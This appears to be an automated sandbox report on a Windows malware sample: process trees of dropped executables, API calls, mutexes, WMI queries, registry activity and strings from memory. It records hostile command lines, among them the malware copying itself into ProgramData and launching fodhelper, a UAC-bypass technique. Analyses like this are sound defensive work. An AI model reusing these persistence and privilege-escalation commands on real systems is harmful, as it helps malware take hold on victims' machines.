Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 18_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	18_2_00409448
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 21_2_00403382 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	21_2_00403382
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	23_2_00454B00

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Code function: 10_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

10_2_004049C7

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Code function: 14_2_006BD43E CreateToolhelp32Snapshot,Module32First,

14_2_006BD43E

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Code function: 10_2_004021AF CoCreateInstance,

10_2_004021AF

Source: C:\Users\user\AppData\Local\Temp\tuc4.exe

Code function: 18_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,

18_2_00409BEC

Source: C:\Users\user\AppData\Local\Temp\etopt.exe

File created: C:\Program Files (x86)\360

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\srvwauv

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Mutant created: \Sessions\1\BaseNamedObjects\b6bf0d21327ed995
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Mutant created: \Sessions\1\BaseNamedObjects\Costura1485B29524EF63EB83DF771D39CCA767
Source: C:\Windows\System32\dialer.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\4854.tmp

Jump to behavior

Source: Yara match	File source: 16.0.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000000.2059737099.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY

Source: uVQLD8YVk6.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\AppData\Local\Temp\4854.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb
Source: C:\Users\user\AppData\Local\Temp\C086.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\uVQLD8YVk6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: 9E77.exe, 0000001E.00000003.2409625576.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, 9E77.exe, 0000001E.00000003.2455472865.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp, nsa984B.tmp.exe, 0000001F.00000003.2362182559.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, nsa984B.tmp.exe, 0000001F.00000003.2362094381.000000001A26B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: uVQLD8YVk6.exe	ReversingLabs: Detection: 81%
Source: uVQLD8YVk6.exe	Virustotal: Detection: 86%

Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: REQUESTED-ADDRESS-FAMILYRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDe
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: yscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerCo
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: PED-ADDRESSMAX_FRAME_SIZEMB; allocated MakeAbsoluteSDMissing quotesModule32FirstWNetUserGetInfoNot AcceptableNtResumeThreadOSArchitectureOpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxProcess32NextWProtection DirQuotation_MarkRCodeNameErrorREFUSED_STR
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: inateProcessTor current modeTor is dowloadedTranslateMessageTrustedInstallerUnregisterClassWUpgrade RequiredUser-Agent: %s VirtualProtectExWinVerifyTrustExWindows DefenderWww-AuthenticateXOR-PEER-ADDRESSZanabazar_Square\windefender.exe runtime stack: address
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: unknown network unpacking headerworkbuf is emptywrite config: %wwww-authenticate spinningthreads=%%!%c(big.Int=%s)%s/address/%s/txs, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method AdjustToke
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: Temporary RedirectTerminateJobObjectTime.MarshalJSON: Time.MarshalText: UNKNOWN-ATTRIBUTESUNKNOWN_SETTING_%dUnknown value typeVariation_SelectorWeb Downloader/6.9WriteProcessMemoryXOR-MAPPED-ADDRESSadaptivestackstartbad Content-Lengthbad manualFreeListbufio: b
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: .654WDG_Validator/1.6.2WSALookupServiceEndWaitForSingleObjectWindowsCreateStringWindowsDeleteStringWinmonSystemMonitorXOR-RELAYED-ADDRESSYukon Standard Timeadjusttimers: bad pafter array elementattribute not foundbad ABI descriptionbad file descriptorbad kind

Source: unknown	Process created: C:\Users\user\Desktop\uVQLD8YVk6.exe C:\Users\user\Desktop\uVQLD8YVk6.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\srvwauv C:\Users\user\AppData\Roaming\srvwauv
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4854.exe C:\Users\user\AppData\Local\Temp\4854.exe
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\780F.exe C:\Users\user\AppData\Local\Temp\780F.exe
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe "C:\Users\user\AppData\Local\Temp\InstallSetup8.exe"
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe "C:\Users\user\AppData\Local\Temp\InstallSetup8.exe"
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe "C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Process created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\tuc4.exe "C:\Users\user\AppData\Local\Temp\tuc4.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\88D9.exe C:\Users\user\AppData\Local\Temp\88D9.exe
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\etopt.exe "C:\Users\user\AppData\Local\Temp\etopt.exe"
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Process created: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp "C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp" /SL5="$1B0070,7884275,54272,C:\Users\user\AppData\Local\Temp\tuc4.exe"
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\etopt.exe "C:\Users\user\AppData\Local\Temp\etopt.exe"
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Process created: C:\Users\user\AppData\Local\Temp\tuc4.exe "C:\Users\user\AppData\Local\Temp\tuc4.exe" /SPAWNWND=$10488 /NOTIFYWND=$1B0070
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\928F.exe C:\Users\user\AppData\Local\Temp\928F.exe
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Process created: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp "C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp" /SL5="$104CE,7884275,54272,C:\Users\user\AppData\Local\Temp\tuc4.exe" /SPAWNWND=$10488 /NOTIFYWND=$1B0070
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9E77.exe C:\Users\user\AppData\Local\Temp\9E77.exe
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Process created: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C086.exe C:\Users\user\AppData\Local\Temp\C086.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\CFAA.exe C:\Users\user\AppData\Local\Temp\CFAA.exe
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 23
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F38F.exe C:\Users\user\AppData\Local\Temp\F38F.exe
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 23
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Process created: C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe "C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe" -i
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\33A6.exe C:\Users\user\AppData\Local\Temp\33A6.exe
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\F38F.exe" "C:\ProgramData\xQfUeydaBrjuHptx.exe" && ping 1.1.1.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4854.exe C:\Users\user\AppData\Local\Temp\4854.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\780F.exe C:\Users\user\AppData\Local\Temp\780F.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\88D9.exe C:\Users\user\AppData\Local\Temp\88D9.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\928F.exe C:\Users\user\AppData\Local\Temp\928F.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9E77.exe C:\Users\user\AppData\Local\Temp\9E77.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C086.exe C:\Users\user\AppData\Local\Temp\C086.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\CFAA.exe C:\Users\user\AppData\Local\Temp\CFAA.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F38F.exe C:\Users\user\AppData\Local\Temp\F38F.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe "C:\Users\user\AppData\Local\Temp\InstallSetup8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe "C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\tuc4.exe "C:\Users\user\AppData\Local\Temp\tuc4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Process created: C:\Users\user\AppData\Local\Temp\etopt.exe "C:\Users\user\AppData\Local\Temp\etopt.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Process created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Process created: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Process created: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp "C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp" /SL5="$1B0070,7884275,54272,C:\Users\user\AppData\Local\Temp\tuc4.exe"
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Process created: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp "C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp" /SL5="$104CE,7884275,54272,C:\Users\user\AppData\Local\Temp\tuc4.exe" /SPAWNWND=$10488 /NOTIFYWND=$1B0070
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 23
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Process created: C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe "C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe" -i
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\C086.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 23
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\F38F.exe" "C:\ProgramData\xQfUeydaBrjuHptx.exe" && ping 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\etopt.exe

File written: C:\Program Files (x86)\ClocX\Presets\Alte Standuhr.ini

Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe

Window found: window name: TButton

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\4854.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\System32\dialer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: 4854.exe, 00000004.00000002.1911380987.0000000004B03000.00000004.00000800.00020000.00000000.sdmp, 4854.exe, 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmp, 4854.exe, 00000004.00000002.1911380987.000000000493F000.00000004.00000800.00020000.00000000.sdmp, 928F.exe, 0000001C.00000002.2745320881.00000000692FD000.00000002.00000001.01000000.00000009.sdmp, 928F.exe, 0000001C.00000002.2549281666.0000000007034000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\zinazibemur\wemotugiw_cudeyatofo88\gajore\fozomupa96\m.pdb source: nsa984B.tmp.exe, 0000001F.00000000.2147347740.0000000000424000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: Age does not matchThe module age and .pdb age do not match. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: symsrv.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000C7A000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000003709000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\rosicena2\regitel_vasecivi\yiyimuk hef\faxezok.pdb`C source: 9E77.exe, 0000001E.00000000.2147800104.000000000044D000.00000002.00000001.01000000.0000001B.sdmp, 9E77.exe, 0000001E.00000003.2173350757.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
